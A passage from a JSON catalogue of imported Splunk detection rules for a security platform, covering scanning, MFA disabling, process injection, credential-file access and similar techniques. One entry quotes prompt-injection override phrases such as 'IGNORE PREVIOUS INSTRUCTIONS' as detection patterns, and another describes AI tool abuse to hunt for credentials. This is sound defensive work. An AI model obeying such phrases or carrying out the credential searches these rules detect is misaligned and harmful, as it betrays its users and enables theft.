triggering multiple IDS signatures, which may include either more than 25 signatures against a single host or a single signature across over 25 destination IP addresses. Such patterns can indicate active vulnerability scanning activities within the network. By monitoring IDS logs, this detection helps identify and respond to potential vulnerability scanning attempts, enhancing the network's security posture and preventing potential exploits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595.002", "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-vulnerability-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46f946ed-1c78-4e96-9906-c7a4be15e39b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_vulnerability_scan.yml" } }, { "id": "splunk-security-content-473bd65f-06ca-4dfe-a2b8-ba04ab4a0084", "type": "detection", "name": "Suspicious Email Attachment Extensions", "description": "The following analytic detects emails containing attachments with suspicious file extensions. It leverages the Email data model in Splunk, using the tstats command to identify emails where the attachment filename is not empty. This detection is significant for SOC analysts as it highlights potential phishing or malware delivery attempts, which are common vectors for data breaches and malware infections. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, system compromise, or data exfiltration. Immediate review and analysis of the identified emails and attachments are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-email-attachment-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "473bd65f-06ca-4dfe-a2b8-ba04ab4a0084", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/suspicious_email_attachment_extensions.yml" } }, { "id": "splunk-security-content-47872bb4-9987-4c33-a897-4d2d1ac7d4c2", "type": "detection", "name": "Windows Outlook Macro Security Modified", "description": "The following analytic detects the modification of the Windows Registry key \"Level\" under Outlook Security. This allows macros to execute without warning, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel, specifically looking for the registry value name \"Level\" with a value of \"0x00000001\". This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-macro-security-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47872bb4-9987-4c33-a897-4d2d1ac7d4c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_macro_security_modified.yml" } }, { "id": "splunk-security-content-47c69803-2c09-408b-b40a-063c064cbb16", "type": "detection", "name": "Windows PowerShell WMI Win32 ScheduledJob", "description": "The following analytic detects the use of the Win32_ScheduledJob WMI class via PowerShell script block logging. This class, which manages scheduled tasks, is disabled by default due to security concerns and must be explicitly enabled through registry modifications. The detection leverages PowerShell event code 4104 and script block text analysis. Monitoring this activity is crucial as it may indicate malicious intent, especially if the class was enabled by an attacker. If confirmed malicious, this could allow attackers to persist in the environment by creating scheduled tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-wmi-win32-scheduledjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47c69803-2c09-408b-b40a-063c064cbb16", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_wmi_win32_scheduledjob.yml" } }, { "id": "splunk-security-content-47dc0426-cbe4-4253-8b86-1a983c3f9951", "type": "detection", "name": "Windows Unusual FileZilla XML Config Access", "description": "The following analytic identifies processes accessing FileZilla XML config files such as recentservers.xml and sitemanager.xml. It leverages Windows Security Event logs, specifically monitoring EventCode 4663, which tracks object access events. This activity is significant because it can indicate unauthorized access or manipulation of sensitive configuration files used by FileZilla, a popular FTP client. If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-filezilla-xml-config-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47dc0426-cbe4-4253-8b86-1a983c3f9951", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_filezilla_xml_config_access.yml" } }, { "id": "splunk-security-content-4807e716-43a4-11ec-a0e7-acde48001122", "type": "detection", "name": "Runas Execution in CommandLine", "description": "The following analytic detects the execution of the runas.exe process with administrator user options. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to gain elevated privileges, a common tactic in privilege escalation and lateral movement. If confirmed malicious, this could allow an attacker to execute commands with higher privileges, potentially leading to unauthorized access, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/runas-execution-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4807e716-43a4-11ec-a0e7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/runas_execution_in_commandline.yml" } }, { "id": "splunk-security-content-482dd42a-acfa-486b-a0bb-d6fcda27318e", "type": "detection", "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an Azure AD user. It leverages Azure Active Directory AuditLogs to identify the \"Disable Strong Authentication\" operation. This activity is significant because disabling MFA can allow adversaries to maintain persistence using compromised accounts without raising suspicion. If confirmed malicious, this action could enable attackers to bypass an essential security control, potentially leading to unauthorized access and prolonged undetected presence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "482dd42a-acfa-486b-a0bb-d6fcda27318e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-4890cd6b-0112-4974-a272-c5c153aee551", "type": "detection", "name": "Kubernetes Scanner Image Pulling", "description": "The following analytic detects the pulling of known Kubernetes security scanner images such as kube-hunter, kube-bench, and kube-recon. It leverages Kubernetes logs ingested through Splunk Connect for Kubernetes, specifically monitoring for messages indicating the pulling of these images. This activity is significant because the use of security scanners can indicate an attempt to identify vulnerabilities within the Kubernetes environment. If confirmed malicious, this could lead to the discovery and exploitation of security weaknesses, potentially compromising the entire Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-scanner-image-pulling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4890cd6b-0112-4974-a272-c5c153aee551", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_scanner_image_pulling.yml" } }, { "id": "splunk-security-content-48cc1605-538c-4223-8382-e36bee5b540d", "type": "detection", "name": "Windows LSA Secrets NoLMhash Registry", "description": "The following analytic detects modifications to the Windows registry related to the Local Security Authority (LSA) NoLMHash setting. It identifies when the registry value is set to 0, indicating that the system will store passwords in the weaker Lan Manager (LM) hash format. This detection leverages registry activity logs from endpoint data sources like Sysmon or EDR tools. Monitoring this activity is crucial as it can indicate attempts to weaken password storage security. If confirmed malicious, this could allow attackers to exploit weaker LM hashes, potentially leading to unauthorized access and credential theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lsa-secrets-nolmhash-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "48cc1605-538c-4223-8382-e36bee5b540d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml" } }, { "id": "splunk-security-content-4902d7aa-0134-11ec-9d65-acde48001122", "type": "detection", "name": "Local Account Discovery With Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments used to query local user accounts, specifically the `useraccount` argument. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local users, which is a common step in situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/local-account-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4902d7aa-0134-11ec-9d65-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/local_account_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-491004ae-694f-453e-b1e0-fc1e65daeea1", "type": "detection", "name": "MacOS Account Created", "description": "The following analytic detects the creation of a new local user account on a MacOS system. It leverages osquery logs to identify this activity.\nMonitoring the creation of local accounts is crucial for a SOC as it can indicate unauthorized access or lateral movement within the network.\nIf confirmed malicious, this activity could allow an attacker to establish persistence, escalate privileges, or gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-account-created.yaml", "provenance": { "source": "splunk/security_content", "source_id": "491004ae-694f-453e-b1e0-fc1e65daeea1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_account_created.yml" } }, { "id": "splunk-security-content-4927c6f1-4667-42e6-bd7a-f5222116386b", "type": "detection", "name": "Windows Modify Registry DisableRemoteDesktopAntiAlias", "description": "The following analytic detects modifications to the Windows registry key \"DisableRemoteDesktopAntiAlias\" with a value set to 0x00000001. This detection leverages data from the Endpoint datamodel, specifically monitoring changes in the Registry node. This activity is significant as it may indicate the presence of DarkGate malware, which alters this registry setting to enhance its remote desktop capabilities. If confirmed malicious, this modification could allow an attacker to maintain persistence and control over the compromised host, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disableremotedesktopantialias.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4927c6f1-4667-42e6-bd7a-f5222116386b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml" } }, { "id": "splunk-security-content-492f09cf-5d60-4d87-99dd-0bc325532dda", "type": "detection", "name": "Windows Process Injection With Public Source Path", "description": "The following analytic detects a process from a non-standard file path on Windows attempting to create a remote thread in another process. This is identified using Sysmon EventCode 8, focusing on processes not originating from typical system directories. This behavior is significant as it often indicates process injection, a technique used by adversaries to evade detection or escalate privileges. If confirmed malicious, this activity could allow an attacker to execute arbitrary code within another process, potentially leading to unauthorized actions and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-with-public-source-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "492f09cf-5d60-4d87-99dd-0bc325532dda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_with_public_source_path.yml" } }, { "id": "splunk-security-content-493a879d-519d-428f-8f57-a06a0fdc107e", "type": "detection", "name": "Samsam Test File Write", "description": "The following analytic detects the creation of a file named \"test.txt\" within the Windows system directory, indicative of Samsam ransomware propagation. It leverages file-system activity data from the Endpoint data model, specifically monitoring file paths within the Windows System32 directory. This activity is significant as it aligns with known Samsam ransomware behavior, which uses such files for propagation and execution. If confirmed malicious, this could lead to ransomware deployment, resulting in data encryption, system disruption, and potential data loss. Immediate investigation and remediation are crucial to prevent further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/samsam-test-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "493a879d-519d-428f-8f57-a06a0fdc107e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/samsam_test_file_write.yml" } }, { "id": "splunk-security-content-49779398-b738-4d64-bb3f-ead6eb97fe53", "type": "detection", "name": "MCP Prompt Injection", "description": "This detection identifies potential prompt injection attempts within MCP (Model Context Protocol) communications by monitoring for known malicious phrases and patterns commonly used to manipulate AI assistants. Prompt injection is a critical vulnerability where adversaries embed hidden instructions in content processed by AI tools, attempting to override system prompts, bypass security controls, or hijack the AI's behavior. The search monitors JSON-RPC traffic for phrases such as \"IGNORE PREVIOUS INSTRUCTIONS,\" \"SYSTEM PROMPT OVERRIDE,\" and \"ignore all security\" which indicate attempts to subvert the AI's intended behavior and potentially execute unauthorized actions through the MCP toolchain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-prompt-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49779398-b738-4d64-bb3f-ead6eb97fe53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_prompt_injection.yml" } }, { "id": "splunk-security-content-4981e2db-1372-440d-816e-3e7e2ed74433", "type": "detection", "name": "Windows AD Domain Root ACL Modification", "description": "ACL modification performed on the domain root object, significant AD change with high impact. Following MS guidance all changes at this level should be reviewed. Drill into the logonID within EventCode 4624 for information on the source device during triage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-root-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4981e2db-1372-440d-816e-3e7e2ed74433", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_root_acl_modification.yml" } }, { "id": "splunk-security-content-49862dd4-9cb2-4c48-a542-8c8a588d9361", "type": "detection", "name": "O365 Advanced Audit Disabled", "description": "The following analytic detects instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It uses O365 audit logs, focusing on events related to audit license changes in AzureActiveDirectory workloads. This activity is significant because the O365 advanced audit provides critical logging and insights into user and administrator activities. Disabling it can blind security teams to potential malicious actions. If confirmed malicious, attackers could operate within the user's mailbox or account with reduced risk of detection, leading to unauthorized data access, data exfiltration, or account compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-advanced-audit-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49862dd4-9cb2-4c48-a542-8c8a588d9361", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_advanced_audit_disabled.yml" } }, { "id": "splunk-security-content-49b7daca-4e3c-4899-ba15-9a175e056fa9", "type": "detection", "name": "Kubernetes newly seen UDP edge", "description": "The following analytic detects UDP communication between a newly seen source and destination workload pair within a Kubernetes cluster. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. This detection compares network activity over the last hour with the past 30 days to identify new inter-workload communication. Such changes in network behavior can indicate potential security threats or anomalies. If confirmed malicious, unauthorized connections may enable attackers to infiltrate the application ecosystem, leading to data breaches, privilege escalation, lateral movement, or disruption of critical services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-newly-seen-udp-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49b7daca-4e3c-4899-ba15-9a175e056fa9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_newly_seen_udp_edge.yml" } }, { "id": "splunk-security-content-49c0d4d6-c55d-4d3a-b3d5-7709fafed70d", "type": "detection", "name": "Windows Multiple Accounts Deleted", "description": "The following analytic detects the deletion of more than five unique Windows accounts within a 10-minute period, using Event Code 4726 from the Windows Security Event Log. It leverages the `wineventlog_security` dataset, segmenting data into 10-minute intervals to identify suspicious account deletions. This activity is significant as it may indicate an attacker attempting to erase traces of their actions. If confirmed malicious, this could lead to unauthorized access removal, hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-accounts-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49c0d4d6-c55d-4d3a-b3d5-7709fafed70d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_accounts_deleted.yml" } }, { "id": "splunk-security-content-49cdce75-f814-4d56-a7a4-c64ec3a481f2", "type": "detection", "name": "O365 ApplicationImpersonation Role Assigned", "description": "The following analytic detects the assignment of the ApplicationImpersonation role in Office 365 to a user or application. It uses the Office 365 Management Activity API to monitor Azure Active Directory audit logs for role assignment events. This activity is significant because the ApplicationImpersonation role allows impersonation of any user, enabling access to and modification of their mailbox. If confirmed malicious, an attacker could gain unauthorized access to sensitive information, manipulate mailbox data, and perform actions as a legitimate user, posing a severe security risk to the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-applicationimpersonation-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49cdce75-f814-4d56-a7a4-c64ec3a481f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_applicationimpersonation_role_assigned.yml" } }, { "id": "splunk-security-content-4a2fdd41-c578-4cd4-9ef7-980e352517f2", "type": "detection", "name": "Circle CI Disable Security Job", "description": "The following analytic detects the disabling of security jobs in CircleCI pipelines. It leverages CircleCI log data, renaming and extracting fields such as job names, workflow IDs, user information, commit messages, URLs, and branches. The detection identifies mandatory jobs for each workflow and checks if they were executed. This activity is significant because disabling security jobs can allow malicious code to bypass security checks, leading to potential data breaches, system downtime, and reputational damage. If confirmed malicious, this could result in unauthorized code execution and compromised pipeline integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/circle-ci-disable-security-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a2fdd41-c578-4cd4-9ef7-980e352517f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/circle_ci_disable_security_job.yml" } }, { "id": "splunk-security-content-4a3f2a7d-6402-4e64-a76a-869588ec3b57", "type": "detection", "name": "PowerShell Script Block With URL Chain", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. It leverages PowerShell operational logs to detect script blocks with embedded URLs, often indicative of obfuscated scripts or those attempting to download secondary payloads. This activity is significant as it may signal an attempt to execute malicious code or download additional malware. If confirmed malicious, this could lead to code execution, further system compromise, or data exfiltration. Review parallel processes and the full script block for additional context and related artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-script-block-with-url-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a3f2a7d-6402-4e64-a76a-869588ec3b57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_script_block_with_url_chain.yml" } }, { "id": "splunk-security-content-4a57877d-9c56-4a50-9ad2-620e2f0ad821", "type": "detection", "name": "MCP Sensitive System File Search", "description": "This detection identifies MCP filesystem tool usage attempting to search for files containing sensitive patterns such as passwords, credentials, API keys, secrets, and configuration files. Adversaries and malicious insiders may abuse legitimate MCP filesystem capabilities to conduct reconnaissance and discover sensitive data stores for exfiltration or credential harvesting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-sensitive-system-file-search.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a57877d-9c56-4a50-9ad2-620e2f0ad821", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_sensitive_system_file_search.yml" } }, { "id": "splunk-security-content-4aa5d062-e893-11eb-9eb2-acde48001122", "type": "detection", "name": "Mshta spawning Rundll32 OR Regsvr32 Process", "description": "The following analytic detects a suspicious mshta.exe process spawning rundll32 or regsvr32 child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUID, process name, and parent process fields. This activity is significant as it is a known technique used by malware like Trickbot to load malicious DLLs and execute payloads. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or download additional malware, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mshta-spawning-rundll32-or-regsvr32-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4aa5d062-e893-11eb-9eb2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml" } }, { "id": "splunk-security-content-4ab6862b-ce88-4223-96c0-f6da2cffb898", "type": "detection", "name": "Windows Obfuscated Files or Information via RAR SFX", "description": "The following analytic detects the creation of RAR Self-Extracting (SFX) files by monitoring the generation of file related to rar sfx .tmp file creation during sfx installation. This method leverages a heuristic to identify RAR SFX archives based on specific markers that indicate a combination of executable code and compressed RAR data. By tracking such activity, the analytic helps pinpoint potentially unauthorized or suspicious file creation events, which are often associated with malware packaging or data exfiltration. Legitimate usage may include custom installers or compressed file delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-obfuscated-files-or-information-via-rar-sfx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4ab6862b-ce88-4223-96c0-f6da2cffb898", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 